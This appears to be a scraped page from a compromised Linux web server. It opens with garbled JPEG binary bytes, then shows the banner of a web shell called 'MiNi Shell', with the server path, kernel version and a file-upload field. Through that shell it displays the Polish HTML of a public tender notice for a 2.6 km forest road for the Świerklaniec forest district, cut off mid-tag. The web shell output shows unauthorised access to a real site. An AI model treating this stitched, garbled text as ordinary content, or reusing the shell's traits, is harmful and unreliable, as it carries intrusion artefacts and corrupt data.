JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250811/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250811/0036953001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa drogi leśnej w leśnictwie Jędrysek Nad koleją </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PGL LP Nadleśnictwo Świerklaniec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272536238</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Oświęcimska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świerklaniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-622</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">swierklaniec@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://swierklaniec.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna i pozostała działalność leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa drogi leśnej w leśnictwie Jędrysek Nad koleją </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d7adb87d-f0fc-46e6-a4ff-836bb28bfcd6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00369530</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00159416/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa drogi leśnej w leśnictwie Jędrysek Nad koleją</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/promoter/tender/69728/summary <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przez platformę e-zakupową JOSEPHINE https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy JOSEPHINE stanowiący załącznik nr 10 do<br/>SWZ.<br/>3. Maksymalny rozmiar plików przesłanych za pośrednictwem platformy JOSEPHINE<br/>wynosi:<br/>-w przypadku wiadomości niezaszyfrowanej - całkowita maksymalna objętość wynosi 500MB<br/>-w przypadku wiadomości zaszyfrowanej - całkowita maksymalna objętość wynosi 300MB<br/>Maksymalna wielkość oznacza całkowita objętość danych Wykonawcy w ramach prowadzonej<br/>operacji<br/>4. Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie JOSEPHINE. Za<br/>datę przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę<br/>ich złożenia na platformie JOSEPHINE.<br/>5. Zamawiający, określa niezbędne wymagania techniczne umożliwiające pracę na platformie<br/>JOSEPHINA tj. a) przeglądarka internetowa:<br/>- Microsoft Internet Explorer w wersji 11,0 i nowsze (http://microsoft.com/), - Google<br/>Chrome (http://google.com/chrome).<br/>- Mozilla Firefox w wersji 13,0 i nowsze (http://firefox.com)<br/>b) aktualna wersja oprogramowania Java. To oprogramowanie jest wymagane w celu<br/>poprawnego działania JOSEPHINE, jak również w momencie kiedy dane są podpisywane<br/>elektronicznym podpisem. Oprogramowanie Java można pobrać ze strony<br/>http://www.java.com/. To oprogramowanie jest dostępne bezpłatnie.<br/>4) Zamawiający, określa dopuszczalne formaty przesyłanych danych tj. plików<br/>o maksymalnej objętości danych wielkości do 500 MB (zalecany format: pdf.) Maksymalna<br/>wielkość oznacza całkowitą objętość danych wykonawcy w ramach prowadzonej operacji.<br/>5) Zamawiający dopuszcza formaty danych określone w rozporządzeniu Rady Ministrów<br/>z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych (tekst jedn.: Dz. U. z 2017 r. poz.<br/>2247) w szczególności formaty: .pdf, .doc, .docx, .rtf, .odt.<br/>6) Zamawiający, określa informacje na temat kodowania i oznaczania czasu odbioru danych.<br/>Odbiór danych przez Platformę stanowi data i godzina wysłania oferty przez Wykonawcę po<br/>kliknięciu w polecenie wyślij. Data i czas wysłania oferty przed upływem terminu składania<br/>ofert bądź po jego upłynięciu jest tym samym czasem, który pokaże się po stronie<br/>Zamawiającego i Wykonawcy. Data oraz dokładny czas (hh/mm/ss), znajduje się<br/>w wyświetlanym wierszu w profilu Wykonawcy i zapisuje się automatycznie do archiwum<br/>zamówienia po stronie Zamawiającego.<br/>7) Wykonawca musi posiadać ważny podpis elektroniczny oparty na kwalifikowanym<br/>certyfikacie spełniającym wymagania rozporządzenia (UE) nr 910/2014 Parlamentu<br/>Europejskiego i Rady Europy oraz odpowiednich przepisów państwowych, bądź podpis<br/>zaufany bądź podpis osobisty. Podpisy elektroniczne oparte na kwalifikowanym certyfikacie<br/>są wystawiane przez kwalifikowanych dostawców usług w poszczególnych państwach<br/>członkowskich UE.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje iż administratorem danych osobowych jest PGL LP Nadleśnictwo Świerklaniec.<br/>Zamawiający przetwarza dane osobowe w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie i są obowiązane do zachowania ich w poufności. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem rozstrzygnięciem<br/>postęp, jak również, w celu zawarcia umowy oraz jej realizacji, udokumentowania postępowania o archiwizacji.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona na podstawie ustawy PZP.<br/>Dane osobowe będą przechowywane przez okres 4lat od dnia zakończenia postępowania lub do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy.<br/>Dane osobowe mogą zostać przekazane podmiotom świadczącym usługi doradcze, usługi prawne, i konsultingowe,<br/>Decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.<br/>Osoba, której dotyczą pozyskane dane osobowe, ma prawo:<br/>-dostępu do swoich danych osobowych<br/>-do sprostowana<br/>-do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych<br/>w przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym<br/>w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych określa PZP. 13. Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku<br/>z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec<br/>przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Z.270.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1497727,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa drogi leśnej o długości konstrukcyjnej 2577 m na terenie<br/>leśnictwa Jędrysek. Droga rozpoczyna się za skrzyżowaniem z istniejąca drogą leśna, dalej<br/>przebiega pomiędzy oddziałami leśnymi nr 294, 344, 295, 345, 296 235, 234 i kończy się<br/>pomiędzy oddziałami nr 161, 160. Przedmiotowa droga będzie pełniła również funkcję dojazdu<br/>pożarowego.<br/>Lokalizacja inwestycji:<br/>Województwo: śląskie<br/>Powiat: tarnogórski<br/>Gmina: 241302_1 Miasteczko Śląskie<br/>Obręb: 0003 Miasteczko Śląskie<br/>Numer działki: 184/181<br/>Gmina: 241301_1 Kalety<br/>Obręb: 0001 Kalety<br/>Numer działki: 466/85<br/>Główny zakres robót:<br/>1) Wytyczenie geodezyjne drogi w terenie;<br/>2) Usunięcie warstwy humusu;<br/>3) Karczowanie pni o średnicach od 16 do 100 cm, wraz z wywozem karpin;<br/>4) Wykonanie koryta w śladzie drogi wraz z mijankami i zjazdami;<br/>5) Profilowanie podłoża pod warstwy konstrukcyjne nawierzchni drogowej;<br/>6) Wzmocnienie podłoża poprzez ułożenie geosiatek i geowłóknin;<br/>7) Wykonanie warstwy podbudowy z kruszywa łamanego – ⌀0/63mm;<br/>8) Wykonanie nawierzchni z kruszywa łamanego - ⌀0/31,5mm;<br/>9) Miałowanie nawierzchni miałem kamiennym - ⌀0/4mm do 0/8mm;<br/>10) Plantowanie poboczy wraz z dowiezieniem materiału – niesort ⌀0/31,5mm oraz ich<br/>zagęszczeniem;<br/>11) Porządkowanie terenu po robotach;<br/>12) Wykonanie powykonawczej inwentaryzacji geodezyjnej.<br/>Projektowane warstwy konstrukcje nawierzchni drogi leśnej, mijanek i zjazdów:<br/>− nawierzchnia z kruszywa naturalnego łamanego 0/31,5 mm C90/3 gr. po zagęszczeniu 10cm,<br/>− dolna warstwa podbudowy z kruszywa naturalnego łamanego 0/63 mm C90/3 gr.<br/>po zagęszczeniu 25 cm,<br/>− georuszt dwukierunkowy BX 25/25 (lub równoważny wytrz. Min.25kN/m) szer. 4m,<br/>− wyprofilowane i zagęszczone podłoże.<br/>Projektowane warstwy konstrukcyjne nawierzchni pobocza:<br/>− kruszywo niesortowane 0/31,5 mm, Is ≥0,98 gr. po zagęszczeniu 10 cm,<br/>− wyprofilowane i zagęszczone podłoże – grunt rodzimy.<br/>Zestawienie powierzchni i długości:<br/>Podstawowe wielkości powierzchni i długości:<br/>• długość konstrukcyjna projektowanego odcinka drogi 2+577 m<br/>• długość rzeczywista projektowanego odcinka drogi 2+576 m<br/>• długość odcinka drogi na terenie nadleśnictwa 2+576 m<br/>• długość zjazdów 277,00 m<br/>• szerokość jezdni 3,50 m<br/>• szerokość poboczy 0,75 m<br/>• szerokość mijanki 3,00 m<br/>• długość mijanki 23,00m<br/>• skosy najazdowe 1: 7 21,00m<br/>• wyokrąglenia wjazdów i wyjazdów mijanki R=50,00m<br/>• powierzchnia jezdni (droga, zjazdy, mijanki) 12 782 m2, w tym min.:<br/>- o powierzchnia zjazdów na drogi leśne 1 696 m2<br/>-o powierzchnia mijanek 1 603 m2<br/>-o powierzchnia poszerzeń jezdni 402 m2<br/>• powierzchnia poboczy 4 120 m2<br/>• powierzchnia robót ziemnych (droga, zjazdy, mijanki, ) 18 496 m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolność do występowania w obrocie gospodarczym: Brak szczególnych wymagań<br/>2) uprawnienie do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Brak szczególnych wymagań<br/>3) sytuacja ekonomiczna i finansowa:<br/>Zamawiający w celu spełnienia powyższego warunku wymaga, aby Wykonawca wykazał się:<br/>-posiadaniem środków na rachunku bankowym bądź zdolnością kredytową na kwotę 400 000,00 zł<br/>-posiadaniem ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia w wysokości sumy gwarancyjne nie<br/>mniejszej niż 500 000,00 zł, a okres ubezpieczenia obejmować musi czas realizacji zamówienia<br/>przez Wykonawcę.<br/>Zamawiający będzie je oceniał:<br/>Spełnia/nie spełnia<br/>4) zdolności technicznej lub zawodowej:<br/>a) W zakresie posiadania wiedzy i doświadczenia:<br/>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie niezbędne do wykonania<br/>zamówienia, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert<br/>(a jeżeli okres działalności jest krótszy, w tym okresie), zrealizował co najmniej dwie roboty<br/>budowlaną polegającą na budowie, przebudowie drogi o nawierzchni z kruszywa łamanego, o<br/>wartości każdej nie mniejszej niż 600 000 zł brutto, z podaniem och wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączy<br/>dokumenty potwierdzające, że roboty te zostały wykonane należycie.<br/>UWAGA<br/>1) Wykonawca może się powołać na doświadczenie zdobyte przy realizacji robót w ramach<br/>konsorcjum, tylko w takim zakresie, w jakim rzeczywiście roboty te sam wykonał<br/>2) W przypadku konsorcjum przynajmniej jedna z firm musi spełnić warunek wymieniony<br/>w pkt. 4a<br/>b.) Odnośnie zatrudnienia<br/>Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia,<br/>jeżeli wykaże:<br/>1) dysponowanie 1 osobą, która przy realizacji niniejszego zamówienia będzie pełnić funkcję<br/>kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi<br/>bez ograniczeń, w specjalności drogowej.<br/>2) dysponowanie minimum 8 osobami przez wykonawcę lub podwykonawcę zatrudnionymi na<br/>podstawie stosunku pracy wykonującymi czynności w zakresie realizacji zamówienia:<br/>- kierowca samochodów ciężarowych – min. 1 osoba (posiadających prawo jazdy kat. C),<br/>- kierowca samochodów ciężarowych – min. 3 osoby (posiadające prawo jazdy kat. C+E)<br/>- operator walca – min. 1 osoba,<br/>- operator koparko-ładowarki – min. 1 osoba,<br/>- operator równiarki – min. 1 osoba,<br/>- operator rozściełacza – min. 1 osoba.<br/>W przypadku sytuacji kiedy jedna osoba będzie wykonywała więcej niż 1 z wyżej<br/>wymienionych czynności (np. 1 osoba jest operatorem koparko-ładowarki i równiarki) należy<br/>wskazać inną osobę do powyższych czynności tak, aby suma osób zatrudnionych na umowę<br/>o pracę wykonujących powyższe czynności stanowiła minimum 8 osób.<br/>Obowiązek zatrudnienia na podstawie umowy o pracę nie dotyczy sytuacji, w której<br/>wykonawca lub podwykonawca osobiście wykonuje powyższe czynności (np. osoba fizyczna<br/>prowadząca działalność gospodarczą, wspólnicy spółki cywilnej).<br/>Warunek ten w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia<br/>zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub na moment realizacji<br/>zamówienia będzie dysponował osobami posiadającymi w/w kwalifikacje.<br/>Zamawiający nie wymaga zatrudnienia na podstawie umów o pracę osób wykonujących<br/>samodzielne funkcje techniczne w budownictwie.<br/>c.) Odnośnie zdolności technicznej<br/>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym niezbędnym do<br/>wykonania zamówienia, jeżeli wykaże, że dysponuje minimum:<br/>- samochodem ciężarowy samowyładowczy 4 osiowy o ładowności w zakresie 20-25 ton – 1<br/>szt.,<br/>- ciągnikiem drogowym siodłowym wraz z naczepą o DMC 40 ton – 3 szt.,<br/>- koparko-ładowarka – 1 szt.,<br/>- walec statyczno-wibracyjny samojezdny – 1 szt.,<br/>- równiarka samojezdna – 1 szt.,<br/>- rozściełacz – 1 szt.<br/>Zamawiający będzie je oceniał:<br/>Spełnia/nie spełnia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty każdy Wykonawca dołącza:<br/>a) aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia<br/>z postępowania (załącznik nr 4).<br/>b) zobowiązanie podmiotu udostępniającego zasoby (jeżeli Wykonawca polega na<br/>zasobach lub sytuacji podmiotu trzeciego) do oddania do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie będzie dysponował<br/>niezbędnymi zasobami tych podmiotów (załącznik nr 5)<br/>oraz oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednie spełnianie warunków udziału<br/>w postępowaniu lub kryteriów selekcji, w zakresie w jakim wykonawca powołuje się<br/>na jego zasoby (Załącznik nr 5a).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span 